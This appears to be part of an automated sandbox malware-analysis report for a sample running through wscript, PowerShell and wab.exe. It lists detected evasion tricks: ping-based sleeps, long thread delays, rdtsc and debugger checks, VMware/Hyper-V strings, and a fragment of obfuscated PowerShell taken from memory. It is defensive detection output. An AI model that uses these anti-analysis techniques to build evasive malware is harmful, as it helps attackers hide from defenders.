Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAD1C0 rdtsc 15_2_23BAD1C0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6358 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3472 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8534 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1185 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 361 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.4 %
Source: C:\Windows\SysWOW64\clip.exe API coverage: 2.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6744 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep count: 8534 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep count: 1185 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8104 Thread sleep count: 361 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\clip.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1738052606.00000271C231D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
Source: wscript.exe, 00000000.00000002.1739125471.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737516212.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1690318667.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691643848.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691509199.00000271C2005000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738992247.00000271C202C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735994815.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1690992572.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735994815.00000271C202C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691643848.00000271C202C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1738052606.00000271C231D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000003.1737953396.00000271C00DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\j[
Source: powershell.exe, 00000007.00000002.2841422392.000001A9A48D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWko%SystemRoot%\system32\mswsock.dllGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntege
Source: powershell.exe, 0000000A.00000002.2228572118.0000000008230000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAD1C0 rdtsc 15_2_23BAD1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0463D244 LdrInitializeThunk,LdrInitializeThunk, 10_2_0463D244
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B533A5 mov eax, dword ptr fs:[00000030h] 15_2_23B533A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B633A0 mov eax, dword ptr fs:[00000030h] 15_2_23B633A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B633A0 mov eax, dword ptr fs:[00000030h] 15_2_23B633A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B8739A mov eax, dword ptr fs:[00000030h] 15_2_23B8739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B8739A mov eax, dword ptr fs:[00000030h] 15_2_23B8739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B28397 mov eax, dword ptr fs:[00000030h] 15_2_23B28397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B28397 mov eax, dword ptr fs:[00000030h] 15_2_23B28397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B28397 mov eax, dword ptr fs:[00000030h] 15_2_23B28397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2E388 mov eax, dword ptr fs:[00000030h] 15_2_23B2E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2E388 mov eax, dword ptr fs:[00000030h] 15_2_23B2E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2E388 mov eax, dword ptr fs:[00000030h] 15_2_23B2E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5438F mov eax, dword ptr fs:[00000030h] 15_2_23B5438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5438F mov eax, dword ptr fs:[00000030h] 15_2_23B5438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C053FC mov eax, dword ptr fs:[00000030h] 15_2_23C053FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E3F0 mov eax, dword ptr fs:[00000030h] 15_2_23B4E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E3F0 mov eax, dword ptr fs:[00000030h] 15_2_23B4E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E3F0 mov eax, dword ptr fs:[00000030h] 15_2_23B4E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B663FF mov eax, dword ptr fs:[00000030h] 15_2_23B663FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEF3E6 mov eax, dword ptr fs:[00000030h] 15_2_23BEF3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C0539D mov eax, dword ptr fs:[00000030h] 15_2_23C0539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h] 15_2_23B403E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h] 15_2_23B403E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h] 15_2_23B403E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h] 15_2_23B403E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h] 15_2_23B403E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h] 15_2_23B403E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h] 15_2_23B403E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h] 15_2_23B403E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEB3D0 mov ecx, dword ptr fs:[00000030h] 15_2_23BEB3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEC3CD mov eax, dword ptr fs:[00000030h] 15_2_23BEC3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB63C0 mov eax, dword ptr fs:[00000030h] 15_2_23BB63C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C05341 mov eax, dword ptr fs:[00000030h] 15_2_23C05341
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B27330 mov eax, dword ptr fs:[00000030h] 15_2_23B27330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF132D mov eax, dword ptr fs:[00000030h] 15_2_23BF132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF132D mov eax, dword ptr fs:[00000030h] 15_2_23BF132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5F32A mov eax, dword ptr fs:[00000030h] 15_2_23B5F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2C310 mov ecx, dword ptr fs:[00000030h] 15_2_23B2C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B50310 mov ecx, dword ptr fs:[00000030h] 15_2_23B50310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB930B mov eax, dword ptr fs:[00000030h] 15_2_23BB930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB930B mov eax, dword ptr fs:[00000030h] 15_2_23BB930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB930B mov eax, dword ptr fs:[00000030h] 15_2_23BB930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6A30B mov eax, dword ptr fs:[00000030h] 15_2_23B6A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6A30B mov eax, dword ptr fs:[00000030h] 15_2_23B6A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6A30B mov eax, dword ptr fs:[00000030h] 15_2_23B6A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BD437C mov eax, dword ptr fs:[00000030h] 15_2_23BD437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B37370 mov eax, dword ptr fs:[00000030h] 15_2_23B37370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B37370 mov eax, dword ptr fs:[00000030h] 15_2_23B37370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B37370 mov eax, dword ptr fs:[00000030h] 15_2_23B37370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEF367 mov eax, dword ptr fs:[00000030h] 15_2_23BEF367
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29353 mov eax, dword ptr fs:[00000030h] 15_2_23B29353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29353 mov eax, dword ptr fs:[00000030h] 15_2_23B29353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h] 15_2_23BB035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h] 15_2_23BB035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h] 15_2_23BB035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB035C mov ecx, dword ptr fs:[00000030h] 15_2_23BB035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h] 15_2_23BB035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h] 15_2_23BB035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFA352 mov eax, dword ptr fs:[00000030h] 15_2_23BFA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h] 15_2_23BB2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2D34C mov eax, dword ptr fs:[00000030h] 15_2_23B2D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2D34C mov eax, dword ptr fs:[00000030h] 15_2_23B2D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB92BC mov eax, dword ptr fs:[00000030h] 15_2_23BB92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB92BC mov eax, dword ptr fs:[00000030h] 15_2_23BB92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB92BC mov ecx, dword ptr fs:[00000030h] 15_2_23BB92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB92BC mov ecx, dword ptr fs:[00000030h] 15_2_23BB92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B402A0 mov eax, dword ptr fs:[00000030h] 15_2_23B402A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B402A0 mov eax, dword ptr fs:[00000030h] 15_2_23B402A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h] 15_2_23B452A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h] 15_2_23B452A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h] 15_2_23B452A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B452A0 mov eax, dword ptr fs:[00000030h] 15_2_23B452A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h] 15_2_23BF92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h] 15_2_23BF92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h] 15_2_23BF92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF92A6 mov eax, dword ptr fs:[00000030h] 15_2_23BF92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h] 15_2_23BC62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC62A0 mov ecx, dword ptr fs:[00000030h] 15_2_23BC62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h] 15_2_23BC62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h] 15_2_23BC62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h] 15_2_23BC62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC62A0 mov eax, dword ptr fs:[00000030h] 15_2_23BC62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC72A0 mov eax, dword ptr fs:[00000030h] 15_2_23BC72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC72A0 mov eax, dword ptr fs:[00000030h] 15_2_23BC72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C052E2 mov eax, dword ptr fs:[00000030h] 15_2_23C052E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6329E mov eax, dword ptr fs:[00000030h] 15_2_23B6329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6329E mov eax, dword ptr fs:[00000030h] 15_2_23B6329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6E284 mov eax, dword ptr fs:[00000030h] 15_2_23B6E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6E284 mov eax, dword ptr fs:[00000030h] 15_2_23B6E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h] 15_2_23BB0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h] 15_2_23BB0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB0283 mov eax, dword ptr fs:[00000030h] 15_2_23BB0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C05283 mov eax, dword ptr fs:[00000030h] 15_2_23C05283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEF2F8 mov eax, dword ptr fs:[00000030h] 15_2_23BEF2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B292FF mov eax, dword ptr fs:[00000030h] 15_2_23B292FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE12ED mov eax, dword ptr fs:[00000030h] 15_2_23BE12ED
